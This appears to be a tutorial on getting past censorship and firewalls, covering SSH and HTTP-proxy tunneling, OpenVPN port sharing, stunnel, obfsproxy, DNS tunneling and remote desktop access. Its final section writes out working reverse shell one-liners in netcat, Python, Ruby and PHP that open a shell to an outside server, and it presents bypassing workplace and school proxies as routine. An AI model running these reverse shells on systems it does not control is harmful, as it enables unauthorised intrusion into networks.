Censorship Circumvention – Bypassing Firewalls & Deep Packet Inspection

Circumventing Censorship and Bypassing Firewalls

1. Censorship and Restrictions:
   • Involves blocking content through firewalls, proxies, and deep packet inspection.
   • Common in countries like China with the Great Firewall, or on private networks like schools or workplaces.
2. Purpose:
   • Access restricted sites like Facebook or bypass ISP blocks and network restrictions.

How Censorship Works

1. Devices Involved:
   • Firewalls, proxies, and censoring devices enforce outbound access restrictions.
   • Block specific content, IP addresses, domains, ports, and protocols.
2. Techniques Used:
   • Application layer filtering and deep packet inspection to block based on protocol rules.
   • TCP and DNS resets for DNS poisoning and keyword blocking.

Methods to Bypass Censorship

1. Using Encrypted Tunnels:
   • Encrypt traffic to mask it from the censoring device.
   • Use allowed ports like TCP 80 (HTTP) and TCP 443 (HTTPS) to send encrypted traffic.
   • GNU httptunnel
2. Proxies:
   • Weak form of evasion but can bypass simple checks.
   • Includes HTTP, HTTPS, and SOX proxies, useful for minor consequence scenarios.
3. SSH Tunneling (Dynamic Port Forwarding):
   • Create a tunnel through firewalls to an SSH server, possibly using ports like 80 or 443.
   • Requires server-side changes or providers supporting different ports.
   • May be susceptible to deep packet inspection if adversaries identify SSH traffic.

Challenges and Considerations

1. Deep Packet Inspection:
   • Can detect and block encrypted protocols like SSH if not properly masked.
   • Requires advanced configurations to bypass.
2. Destination-Based Censorship:
   • Blocks access based on user location or IP address, like BBC or Netflix.
   • Requires changing perceived location through proxies or VPNs.
3. Web Traffic Fingerprinting:
   • Even encrypted traffic can be analyzed to determine the destination.

DigitalOcean | Cloud Infrastructure for Developers

Cntlm: Fast NTLM Authentication Proxy in C

Configure Proxy Settings in Firefox | Extension Development and ToolKit :: WebExtension.ORG

Understanding these techniques helps in navigating through censorship and restrictions. Each method comes with its considerations and best fits different scenarios, from accessing blocked sites to maintaining privacy in restricted environments. Always ensure compliance with local laws and regulations when employing these methods.

Bypassing Firewalls and Censorship

OpenVPN Tunnels

1. Overview:
   • Similar to SSH tunnels but using a different protocol.
   • Typically uses port 1194 on UDP but may need changing to bypass firewalls.
   • Port 53 UDP is optimal for speed, while port 443 can mimic regular traffic.
2. Deep Packet Inspection (DPI):
   • Can identify VPN traffic despite encryption.
   • Requires server-side changes and a provider like AirVPN.
3. Advantages:
   • Effective if destinations block your real IP or location.
   • Custom OpenVPN servers avoid known VPN blocks.

Challenges with VPNs

1. Blocking by Services:
   • Services like Netflix block known VPNs.
   • Using personal VPN servers can bypass these blocks.
2. Web Traffic Fingerprinting:
   • May reveal surfing destinations despite encryption.

Tor

1. Designed for Bypassing Censorship:
   • Uses bridges and pluggable transports to disguise traffic.
   • Can make traffic appear as other protocols or random.
2. Limitations:
   • Not always foolproof; high-risk scenarios may require alternatives.
3. Advantages:
   • Bypasses local censorship effectively if consequences are low.

Combining Techniques

1. Nesting Layers:
   • Use nested tunnels, e.g., SSH out of a sensor, then Tor.
   • Useful if certain protocols like Tor are blocked.
2. Multi-Layered Approach:
   • Combine SSH, VPNs, and Tor for enhanced evasion.

Other Methods

1. Alternative Networks:
   • Use mobile networks or hotspots if traditional bypassing fails.
2. Advanced Techniques:
   • Combine methods for complex bypass strategies.

Best http tunnel and http tunneling software,include client and server, bypass proxy and bypass firewall

Bypassing firewalls and censorship requires understanding different technologies and their limitations. OpenVPN and Tor offer powerful solutions but may need customization or combination with other techniques to be effective. Consider the level of adversary and consequences when choosing a method.

Bypassing HTTP Proxies

When you are behind an HTTP proxy, such as at work, school, university, or on a private network, you may need to bypass it to access the internet freely. This guide will walk you through identifying the proxy settings and using tools like Corkscrew and Proxy Tunnel to bypass HTTP proxies.

Identifying Proxy Settings

1. Browser Settings:
   • Check your browser settings to determine if you are using a proxy. Look for “HTTP proxy” in the network settings.
   • Note down the IP address and port number of the proxy server.
2. Windows Internet Explorer:
   • On Windows, check Internet Explorer for system proxy settings.
   • Again, note down the IP address and port number.
3. Transparent Proxies:
   • If you are using a transparent proxy, there will be no settings in the browser, and you will automatically go through the proxy.
4. Auto-Detect Proxy Settings:
   • If you are using auto-detect proxy settings, you may be using a Proxy Auto-Config (PAC) file. Locate the PAC file to find the proxy’s IP address and port.

Types of HTTP Proxies

1. HTTP-Only Proxies:
   • Many HTTP proxies do not proxy HTTPS traffic. They only proxy HTTP traffic because HTTPS requires more administrative effort, including adding encryption certificates.
   • These proxies use the HTTP Connect command to forward HTTPS traffic to the final destination.
2. Full HTTPS Proxies:
   • Some proxies fully proxy HTTPS traffic, breaking the encryption at the proxy server.
   • These proxies can filter traffic based on its content, as they have access to the decrypted data.

Bypassing HTTP Proxies

1. Corkscrew:
   • Corkscrew is a tool for tunneling SSH through HTTP proxies. It supports multiple operating systems, including Mac OS X, Windows, and Linux.
   • Install Corkscrew using your package manager (e.g., sudo apt-get install corkscrew on Debian/Kali).
2. Using Corkscrew:
   • Open a dynamic SOCKS proxy on your local machine that sends traffic through the HTTP proxy to an SSH server.
   • Example command: ssh -p 22 -o ProxyCommand="corkscrew <proxy_ip> <proxy_port> %h %p" -D 8080 demo.offsce.com
   • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
   • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).
3. Proxy Tunnel:
   • Proxy Tunnel is another tool for tunneling traffic through HTTP proxies. It is available for Windows, Linux, and Mac.
   • Install Proxy Tunnel using your package manager (e.g., sudo apt-get install proxytunnel on Debian/Kali).
4. Using Proxy Tunnel:
   • Example command: ssh -p 22 -o ProxyCommand="proxytunnel -p <proxy_ip>:<proxy_port> -d demo.stationx.net:22" -D 8080 demo.offsce.com
   • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
   • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).

Handling Authentication and Additional Requirements

1. Proxy Authentication:
   • If the proxy requires authentication, you can pass the username and password using the P option with Proxy Tunnel: proxytunnel -p <proxy_ip>:<proxy_port> -P username:password -d demo.offsce.com:22
   • Alternatively, store the username and password in a file and use the F option: proxytunnel -p <proxy_ip>:<proxy_port> -F authfile -d demo.offsce.com:22
2. User Agent and Referrer:
   • Some proxies may require additional information like the user agent and referrer. You can provide this with Proxy Tunnel using the H option: proxytunnel -p <proxy_ip>:<proxy_port> -H "User-Agent: <user_agent>" -H "Referer: <referrer>" -d demo.offsce.com:22

Simplifying Commands with SSH Config

1. SSH Config File:
   • To simplify the command, you can configure the SSH client to use the proxy settings automatically by editing the SSH config file (~/.ssh/config): Host demo User your_username HostName demo.offsce.com Port 22 DynamicForward 8080 ProxyCommand proxytunnel -p <proxy_ip>:<proxy_port> -d %h:%p
   • Replace <proxy_ip> and <proxy_port> with the IP address and port of the proxy server.
   • Replace 22 with the port allowed by your firewall (e.g., 80 or 443).

Other Tools

1. HTTPC Tunnel:
   • HTTPC Tunnel is another tool that can be used to create connections between a server and a client, bypassing HTTP proxies.
   • Available for Windows and Linux.
2. NTLM Authentication Proxy:
   • If you need to handle NTLM authentication in a Windows environment, use an NTLM authentication proxy to bypass the HTTP proxy.

Bypassing HTTP proxies can be achieved using tools like Corkscrew and Proxy Tunnel. By understanding the proxy settings and using the appropriate tools, you can create a secure tunnel to access the internet freely. Always consider the consequences of bypassing proxies, as a keen administrator may discover these techniques.

Bypassing Firewalls with Port Sharing and Port Knocking

When you are being censored or monitored, the censor may actively probe your connections to determine where you are going or coming from. This can be detected if the traffic doesn’t match the expected pattern, such as DNS requests or normal web traffic. To avoid detection, you can use techniques like port sharing and port knocking to confuse the probing and bypass firewalls.

Port Sharing

1. What is Port Sharing?
   • Port sharing involves running multiple services on the same port. For example, you can run HTTPS, SSH, OpenVPN, and other services on port 443.
   • Based on the handshake of the client connecting, the appropriate service will continue the connection.
2. SSLH: Application Protocol Multiplexer
   • SSLH is a free, open-source application protocol multiplexer that allows you to run multiple services on the same port.
   • It supports protocols like HTTP, HTTPS, SSH, OpenVPN, Tinc, XMPP, and more.
   • SSLH is available for Debian, Gen2, FreeBSD, and other operating systems.
   • Installation:
     • SSLH can be installed from the Debian repository using sudo apt-get install sslh.
   • Configuration:
     • SSLH accepts connections on the same port and forwards them to the appropriate service based on the client’s handshake.
     • Example: Running HTTPS, SSH, and OpenVPN on port 443.
     • SSLH: A SSL/SSH Multiplexer for Linux | Unixmen
3. Guide for SSLH:
   • Check out the SSLH installation guide for detailed instructions on setting it up on Debian or Turnkey Linux.
   • sslh/doc/config.md at master · yrutschle/sslh · GitHub

OpenVPN Port Sharing

1. Using OpenVPN’s Port Share Feature:
   • OpenVPN has a built-in feature called port sharing that allows it to share a port with another service, such as a web server.
   • Steps:
     1. Change your web server to listen on a different port (e.g., 4443).
     2. In the OpenVPN server configuration (server.conf), enable port sharing: port-share 127.0.0.1 4443
     3. Ensure the protocol is set to TCP (not UDP).
   • How It Works:
     • When OpenVPN receives a connection on its port (e.g., 443), it checks the protocol. If it’s not an OpenVPN protocol, it proxies the connection to the web server on port 4443.
     • This allows you to run OpenVPN and a web server on the same port (443).
2. Setting Up on PFSense:
   • OpenVPN port sharing can also be configured on PFSense.
   • Refer to the PFSense guide for detailed instructions.

Port Knocking

1. What is Port Knocking?
   • Port knocking is a method where you send a specific sequence of packets (or “knock”) to a server to enable a service, such as SSH.
   • Without the correct knock, the service appears to be unavailable.
2. Implementations:
   • There are many implementations of port knocking, such as:
     • Knock Knock by Moxie
     • Port Knocking by Stefano
     • Simple Port Knocking by Daniel
   • Knock Knock by Moxie:
     • Knock Knock sends a single SYN packet to the server, encoded with an IND CCA secure encrypted request.
     • The server opens a specified port to a specified IP address, allowing you to connect.
3. Use Case:
   • Port knocking can be used to reduce the attack surface on your server by keeping services like SSH closed until you need them.
   • It can also be used to bypass firewalls by knocking to enable a service temporarily, using it, and then closing it.

portknocking – Keamanan Koneksi Networking Komputer – portknocking – Sistem Keamanan Untuk Koneksi Networking Komputer

Port sharing and port knocking are effective techniques to bypass firewalls and confuse active probes. By running multiple services on the same port (e.g., SSLH or OpenVPN port sharing) or using port knocking to enable services temporarily, you can maintain privacy and anonymity while accessing restricted networks.

Traffic Cloaking and Obfuscation to Bypass Firewalls

Traffic cloaking and obfuscation techniques are designed to encrypt and alter your traffic to evade content filters and deep packet inspection (DPI). These methods allow you to bypass firewalls by making your traffic appear as legitimate or undetectable.

S-Tunnel: TLS Encryption Wrapper

1. What is S-Tunnel?
   • S-Tunnel is a proxy designed to add TLS (Transport Layer Security) encryption to existing clients and servers without requiring changes to the program’s code.
   • It acts as a TLS/SSL encryption wrapper between a remote client and server.
2. How It Works:
   • S-Tunnel allows non-SSL-aware daemons to communicate with clients over secure SSL channels.
   • It is commonly used to wrap traffic in TLS over port 443, which is often allowed by firewalls for HTTPS traffic.
3. Example Use Case:
   • You can use S-Tunnel to wrap OpenVPN traffic in TLS, making it appear as genuine HTTPS traffic instead of OpenVPN traffic, which is detectable via DPI.
4. Features:
   • S-Tunnel uses the OpenSSL library for encryption, supporting a wide range of cryptographic algorithms.
   • It is free software under the GNU GPL version 2 and available for multiple platforms, including Linux, Unix, Windows, Android, and more.
5. Installation:
   • S-Tunnel is available in the Debian repository as stunnel4. Install it using: sudo apt-get install stunnel4
   • It is also available for Windows, Mac OS X, iOS (via Cydia), and other platforms.
6. Setting Up S-Tunnel:
   • To set up S-Tunnel with OpenVPN or SSH on Debian, refer to the S-Tunnel guide for detailed instructions.
   • Tunnel SSH Connections Over SSL Using ‘Stunnel’ On Debian 7 / Ubuntu 13.10 | Unixmen

Obfsproxy and Pluggable Transports

1. What are Pluggable Transports?
   • Obfsproxy and pluggable transports are techniques used to obfuscate traffic, making it appear as another protocol or random data.
   • These techniques are not limited to Tor and can be used for other traffic, such as OpenVPN or SSH.
2. How It Works:
   • You can install Obfsproxy on your server and use it to obfuscate OpenVPN or SSH traffic, allowing it to bypass firewalls that block specific protocols.
   • Some pluggable transports make traffic look like another protocol (e.g., HTTP), while others make it appear random.
3. Example: Meek Transport
   • Meek uses a content delivery network (CDN) to disguise traffic. If blocked, it could restrict access to many other sites, making it difficult for firewalls to block without affecting other users.
4. Advantages:
   • Pluggable transports can evade IP-based blocks and casual DPI.
   • They are effective for bypassing firewalls that rely on protocol detection.
5. Setting Up Obfsproxy:
   • Refer to the Obfsproxy guide for instructions on setting it up with OpenVPN or other protocols.

Other Cloaking and Obfuscation Tools

1. Psiphon: Circumvention System
   • Psiphon is a circumvention system that uses SSH and VPN tunnels with obfuscation to avoid DPI.
   • It dynamically discovers new servers and is available for Windows and Android.
   • https://github.com/Psiphon-Labs/psiphon-tunnel-core
   • https://github.com/Psiphon-Inc/psiphon
2. Lohana: Censorship-Busting Script
   • Lohana is a set of scripts that turn an Ubuntu EC2 instance into a censorship-busting VPN.
   • It tunnels traffic through Tor, allowing you to bypass firewalls that block Tor but allow VPNs.
3. DNS Tunneling: DNS-CAT2
   • DNS tunneling allows you to send traffic over the DNS port to bypass firewalls.
   • DNS-CAT2 is a tool that supports encryption and centralized server management.
   • It is useful for bypassing firewalls that allow DNS but block other protocols.
   • Refer to the DNS-CAT2 guide for setup instructions.
4. Bidirectional VPN Over DNS
   • It is possible to set up a bidirectional VPN over DNS using tools like DNS-CAT2.
   • This is useful in environments where DNS resolves but other traffic is blocked (e.g., airports, hotels).

Tunneling Data and Commands Over DNS to Bypass Firewalls

AB9IL.net | KiwiSDR | Web-888 SDR | WebSDR | PhantomSDR | RTL-SDR | ATA Airlines | Viva Macau Airlines | Boeing 767 and 737 Pictures

GitHub – yarrick/iodine: Official git repo for iodine dns tunnel

Traffic cloaking and obfuscation techniques like S-Tunnel, Obfsproxy, Siphon, Lohana, and DNS tunneling are powerful tools for bypassing firewalls and evading deep packet inspection. By encrypting and altering your traffic, you can maintain privacy and access restricted networks.

Bypassing Firewalls with Remote Login Tools

Remote login tools like VNC and RDP allow you to connect to a remote server and access its desktop, essentially giving you control of the remote machine. However, these tools often require direct connections through specific ports, which may be blocked by firewalls. This guide will explore how to bypass firewalls using remote login tools, tunneling techniques, and clientless solutions like Guacamole.

Traditional Remote Login Tools

1. VNC (Virtual Network Computing):
   • VNC is a remote desktop protocol that allows you to control a remote machine’s desktop.
   • It typically uses ports 5900 (for VNC) and 5800 (for VNC web interface).
   • These ports may need to be allowed by the firewall or changed to ports like 443 or 80 to bypass restrictions.
2. RDP (Remote Desktop Protocol):
   • RDP is a Microsoft protocol for remote desktop access.
   • By default, it uses TCP and UDP port 3389.
   • You can change the port to 443 to bypass firewalls that allow HTTPS traffic.

Challenges with Traditional Tools

• Direct Connection Requirement:
  • Both VNC and RDP require a direct connection to the server, which may be blocked by firewalls.
  • Deep packet inspection (DPI) can detect and block these protocols, even if they use non-standard ports.

Tunneling Remote Login Tools

1. Tunneling Through SSH:
   • You can tunnel VNC or RDP through SSH to add encryption and bypass firewalls.
   • Example Command for Local Port Forwarding: ssh -L 8080:localhost:5900 -p 443 user@remote_server
   • This command creates a local port (8080) on your machine that forwards to the VNC server (port 5900) on the remote server via SSH over port 443.
   • Configure your VNC client to connect to localhost:8080.
2. Using S-Tunnel:
   • S-Tunnel can be used to wrap VNC or RDP traffic in TLS, allowing it to bypass firewalls that allow HTTPS traffic.
   • Example Configuration:
     • Wrap VNC or RDP traffic in TLS and forward it over port 443.

Clientless Remote Desktop Solutions

1. Guacamole: Clientless Remote Desktop Gateway
   • Guacamole is a free, open-source, clientless remote desktop gateway that allows you to access remote desktops via a web browser.
   • It supports standard protocols like VNC and RDP.
   • Advantages:
     • Accessible via HTTPS, allowing it to bypass firewalls that allow HTTPS traffic.
     • No client software required; all you need is a web browser.
   • Setup:
     • Install Guacamole on your server and configure it to connect to your remote desktop.
     • Access Guacamole via a web browser using HTTPS.
2. RDP via Browser Extension:
   • Some browser extensions allow you to access RDP without installing client software.
   • This can be useful in environments where installation is restricted.

Kasm Workspaces | The Container Streaming Platform

Remote login tools like VNC and RDP can be powerful for accessing remote desktops, but their direct connection requirements often make them vulnerable to firewall restrictions. By tunneling these tools through SSH or using clientless solutions like Guacamole, you can bypass firewalls and maintain secure remote access.

Bypassing Firewalls with Reverse Connections

Sometimes, you may find yourself outside a firewall (e.g., on the internet) and want to access a network behind it, such as an office, private network, school, or university. If you can run code on a machine within the network, you can create reverse connections to bypass inbound firewall restrictions.

Reverse Connection Basics

1. What is a Reverse Connection?
   • A reverse connection is a technique where a machine inside the firewall initiates an outbound connection to a server outside the firewall.
   • This allows communication even when inbound connections are blocked.
2. How It Works:
   • The internal machine connects to an external server (e.g., on port 80 or 443) using an outbound connection.
   • The external server listens for these connections and forwards them to the client outside the firewall.

Remote Access Tools Using Reverse Connections

1. TeamViewer and LogMeIn:
   • These tools use reverse connections to provide remote administration of devices behind firewalls and NAT (Network Address Translation).
   • They connect out through ports like 80 or 443 (HTTPS) to a central server.
   • The client outside the firewall connects to the central server, which forwards the connection to the internal device.
2. Advantages:
   • Bypasses NAT and inbound firewall restrictions.
   • The internal device does not need to be permanently online; it only connects when needed.

Creating Reverse Connections with SSH

1. Remote Port Forwarding:
   • SSH allows you to create reverse connections using remote port forwarding.
   • Example Command: ssh -R 8080:localhost:22 user@external_server
   • This command forwards port 22 on the internal machine to port 8080 on the external server.
2. Dynamic DNS:
   • If the external server does not have a static IP, you can use dynamic DNS to ensure the internal machine knows where to connect.

Reverse Shells

1. What is a Reverse Shell?
   • A reverse shell is a technique where an internal machine connects to an external server, providing a shell prompt for remote access.
2. Setting Up a Reverse Shell:
   • Server Side (Listener):
     • Use a tool like Netcat to listen on a port (e.g., 8080): nc -lvp 8080
   • Client Side (Internal Machine):
     • Use Netcat to connect to the external server: nc -e /bin/bash external_server 8080
     • Alternatively, use Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("external_server",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3. Advantages:
   • Provides remote access to the internal machine via a shell prompt.
   • Can be extended to establish a GUI connection if needed.

Other Reverse Shell Techniques

1. Using Different Languages:
   • Reverse shells can be created using various programming languages, such as Ruby, PHP, and more.
   • Example in Ruby: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("external_server","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
   • Example in PHP: php -r '$sock=fsockopen("external_server",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

Reverse connections are a powerful way to bypass firewalls and access internal networks when inbound connections are blocked. By using tools like TeamViewer, LogMeIn, SSH, or creating reverse shells, you can maintain remote access to devices behind firewalls.

Conclusion

This article details ways to bypass firewalls and censorship, including using technologies such as encrypted tunnels, proxies, SSH tunnels, VPNS, Tor, and backconnections. With these methods, restricted websites and networks can be accessed while maintaining privacy and anonymity.